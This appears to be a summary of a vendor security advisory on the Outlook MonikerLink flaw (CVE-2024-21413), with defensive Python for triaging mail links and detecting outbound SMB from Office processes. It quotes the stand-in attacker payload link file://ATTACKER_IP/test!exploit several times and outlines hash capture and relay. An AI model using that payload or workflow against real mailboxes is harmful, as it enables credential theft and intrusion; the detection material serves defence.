Microsoft Outlook Remote Code Execution Vulnerability | SonicWall

SonicWall published an analysis of the MonikerLink vulnerability in Microsoft Outlook (CVE-2024-21413), which abuses file:// moniker handling to coerce an outbound SMB authentication and can lead to remote code execution. A crafted moniker (for example, file://ATTACKER_IP/test!exploit) bypasses Outlook's Protected View check, letting an attacker capture the victim's netNTLMv2 hash, with both 1-click and 0-click exploitation paths demonstrated. #CVE-2024-21413 #MicrosoftOutlook

Keypoints

  • MonikerLink vulnerability CVE-2024-21413 in Microsoft Outlook allows NTLM credential leaks and potential remote code execution by abusing COM monikers.
  • Affected products include Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps (32‑bit and 64‑bit variants).
  • The issue is rated CVSS 9.8: network attack vector, low attack complexity, no privileges required and no user interaction, the last of which is borne out by the later 0-click PoCs.
  • The flaw is in how Outlook hands file:// hyperlinks to MkParseDisplayName for moniker parsing; appending a special character such as “!” plus extra text (e.g., file://ATTACKER_IP/test!exploit) bypasses the Protected View check and makes Outlook attempt SMB authentication to the named host.
  • Attack flow: attacker sends a crafted email with a moniker link, an SMB listener captures the resulting netNTLMv2 hash, and a PoC demonstrates 1-click RCE with later 0-click variants.
  • Mitigations include vendor patches and SonicWall IPS signatures IPS:4305 and IPS:4307 to detect the MonikerLink bypass.

MITRE Techniques

  • None mentioned – the article does not reference specific MITRE ATT&CK technique IDs.

Indicators of Compromise

  • [Hyperlink/URI] Exploit moniker used to trigger the vulnerability – file://ATTACKER_IP/test, file://ATTACKER_IP/test!exploit
  • [Vulnerability ID] Identifies the flaw – CVE-2024-21413
  • [IDS/IPS signatures] SonicWall detections released for this exploit – IPS:4305, IPS:4307
  • [Credential artifact] Authentication captured via SMB – netNTLMv2 hash (captured by attacker’s SMB listener)

The vulnerability stems from how Outlook resolves COM monikers via the MkParseDisplayName API: when a file:// hyperlink in an email points at a remote host, Outlook can be coerced into resolving the moniker over the network using SMB. A plain file:// link is normally caught by Outlook's Protected View checks, but inserting a special character (“!”, which in COM display-name syntax separates the file moniker from an item moniker) followed by additional text (for example, file://ATTACKER_IP/test!exploit) slips past those checks. Outlook then opens an SMB connection to the attacker's host, the Windows SMB client authenticates automatically with the logged-on user's credentials, and the victim's netNTLMv2 challenge-response hash is exposed to the remote SMB listener.
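To make the moniker structure concrete, here is an added example (not code from the SonicWall article, Microsoft or Check Point) in Python that models how a file:// display name such as file://ATTACKER_IP/test!exploit decomposes into a file moniker (the UNC host and path) and an item moniker (the text after the first “!”), and uses that decomposition to triage hyperlinks pulled from a mail body. The HTML snippet and the 192.0.2.10 host are constructed; the splitting rule is a simplified model of the display-name syntax, not a reimplementation of MkParseDisplayName.

```python
import html
import re

# Constructed sample mail body (not from the article); 192.0.2.10 is a
# documentation address standing in for an attacker-controlled SMB server.
SAMPLE_HTML = """
<p>Quarterly numbers are <a href="https://example.com/report.pdf">here</a>.</p>
<p>Archive copy: <a href="file:///C:/Users/Public/notes.txt">local notes</a></p>
<p>Shared draft: <a href="file://ATTACKER_IP/test!exploit">open draft</a></p>
<p>Old link: <a href="file://\\\\192.0.2.10\\share\\invoice.rtf">invoice</a></p>
"""

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
DRIVE_RE = re.compile(r"^[A-Za-z]:")


def extract_links(body):
    """Pull href targets out of an HTML mail body (a simple regex is enough for triage)."""
    return [html.unescape(h) for h in HREF_RE.findall(body)]


def parse_file_link(link):
    """Simplified model of a file:// display name.

    Returns None for non-file links, otherwise a dict with the UNC host
    (None for drive-letter paths), the path, and the item-moniker text that
    follows the first '!' (None when absent). In COM display-name syntax '!'
    separates the file moniker from an item moniker, which is the construct
    the MonikerLink bypass relies on.
    """
    if not link.lower().startswith("file:"):
        return None
    rest = link[len("file:"):].replace("\\", "/").lstrip("/")
    body, bang, item = rest.partition("!")
    item = item if bang else None
    if DRIVE_RE.match(body):
        return {"host": None, "path": body, "item": item}
    host, _, path = body.partition("/")
    return {"host": host or None, "path": path, "item": item}


def classify(link):
    """Map a link to a triage verdict."""
    parsed = parse_file_link(link)
    if parsed is None:
        return "not-file"
    if parsed["host"] is None:
        return "local-file"
    if parsed["item"] is not None:
        return "monikerlink"      # remote file moniker plus item moniker
    return "remote-file"          # plain UNC target: still forces SMB auth


def triage_html(body):
    """Classify every hyperlink in a mail body and record the remote host, if any."""
    findings = []
    for link in extract_links(body):
        parsed = parse_file_link(link)
        findings.append({"link": link, "verdict": classify(link),
                         "host": parsed["host"] if parsed else None})
    return findings


def smb_targets(findings):
    """Hosts the client would authenticate to over SMB: candidate IoCs to block."""
    return sorted({f["host"] for f in findings
                   if f["verdict"] in ("monikerlink", "remote-file")})


if __name__ == "__main__":
    results = triage_html(SAMPLE_HTML)
    for f in results:
        print(f"{f['verdict']:<12} {f['link']}")
    print("SMB targets:", smb_targets(results))
```

A plain file:// link to a UNC host is reported separately from the “!” form because it still coerces an SMB authentication even without the Protected View bypass; both verdicts are worth blocking at the mail gateway, and the extracted hosts are the values to feed into firewall and proxy denylists.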

Exploitation is straightforward in practice: the attacker sends a crafted email containing the malicious file:// link, runs an SMB listener (and the PoC) on the host named in the link, and waits for the client to resolve the moniker. Initial demonstrations required the victim to click the link (the 1‑click RCE path); later proofs of concept removed the need for interaction (a 0‑click NTLM leak). The captured netNTLMv2 hash can be relayed to another service that accepts NTLM or cracked offline, depending on the attacker's position and the password's strength, and because the bypass also defeats Protected View, the attacker-hosted file the moniker points to can be opened without that sandbox, which is how the PoC reaches arbitrary code execution.

Defensive measures are to apply Microsoft's patches (released in February 2024) immediately and to deploy network and application-layer protections that detect this behaviour; SonicWall released IPS signatures (IPS:4305 and IPS:4307) to flag MonikerLink security feature bypass attempts. Until systems are patched, block outbound SMB (TCP 445) from workstations at the network edge, alert on SMB connections initiated by Outlook or other Office processes to hosts outside the organisation, and block or log file:// link resolutions from untrusted mail content. Signatures and SMB blocking reduce the NTLM-leak exposure but do not remove the parsing flaw itself; only the patch does.
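As an added example of the monitoring side (my code, not SonicWall's signatures or any vendor's rule), the following Python flags outbound SMB connections initiated by Office processes to addresses outside the corporate ranges, run over a handful of constructed Sysmon-style network-connection records. The internal ranges, the process list, the inclusion of TCP 139 alongside 445 and the events themselves are assumptions for the example; on a real fleet the input would be Sysmon Event ID 3 or equivalent EDR telemetry.

```python
import ipaddress

# Constructed Sysmon-style network-connection records (Event ID 3 shape,
# reduced to the fields the rule needs): time|image|dst_ip|dst_port|protocol
SAMPLE_EVENTS = r"""
2024-02-15T10:01:02Z|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|10.1.2.3|445|tcp
2024-02-15T10:01:09Z|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|203.0.113.7|445|tcp
2024-02-15T10:01:11Z|C:\Program Files\Google\Chrome\Application\chrome.exe|203.0.113.7|443|tcp
2024-02-15T10:02:30Z|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|198.51.100.22|445|tcp
2024-02-15T10:02:45Z|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|10.1.2.3|443|tcp
""".strip().splitlines()

# Assumptions for this example: which processes count as mail/Office clients
# and which address ranges are the organisation's own (adjust to your estate).
OFFICE_IMAGES = {"OUTLOOK.EXE", "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SMB_PORTS = {445, 139}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_event(line):
    """Split one record into a dict; returns None on a malformed line."""
    parts = line.split("|")
    if len(parts) != 5:
        return None
    time, image, dst, port, proto = parts
    try:
        ipaddress.ip_address(dst)           # reject garbage addresses early
        return {"time": time, "image": image, "dst": dst,
                "port": int(port), "proto": proto.lower()}
    except ValueError:
        return None


def is_internal(ip):
    """True when the address falls inside one of the assumed corporate ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def image_name(path):
    """Basename of a Windows image path, upper-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].upper()


def detect_outbound_smb(lines):
    """Return alerts for Office processes talking SMB to non-internal hosts.

    Internal file-server traffic from Outlook is normal; an Office process
    opening SMB to an external address is the footprint of a coerced NTLM
    authentication such as the MonikerLink leak.
    """
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["proto"] != "tcp":
            continue
        if image_name(ev["image"]) not in OFFICE_IMAGES:
            continue
        if ev["port"] not in SMB_PORTS or is_internal(ev["dst"]):
            continue
        alerts.append({"time": ev["time"], "image": image_name(ev["image"]),
                       "dst": ev["dst"], "port": ev["port"],
                       "reason": "Office process initiated SMB to external host "
                                 "(possible NTLM leak / MonikerLink)"})
    return alerts


if __name__ == "__main__":
    for a in detect_outbound_smb(SAMPLE_EVENTS):
        print(f"{a['time']} {a['image']} -> {a['dst']}:{a['port']}  {a['reason']}")
```

The rule deliberately ignores internal destinations so that ordinary file-share access does not page anyone; if the estate already blocks TCP 445 egress at the edge, the same events still surface as failed connection attempts and remain worth alerting on, because they identify the mailbox that received the crafted link.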

Read more: https://blog.sonicwall.com/en-us/2024/02/microsoft-outlook-remote-code-execution-vulnerability/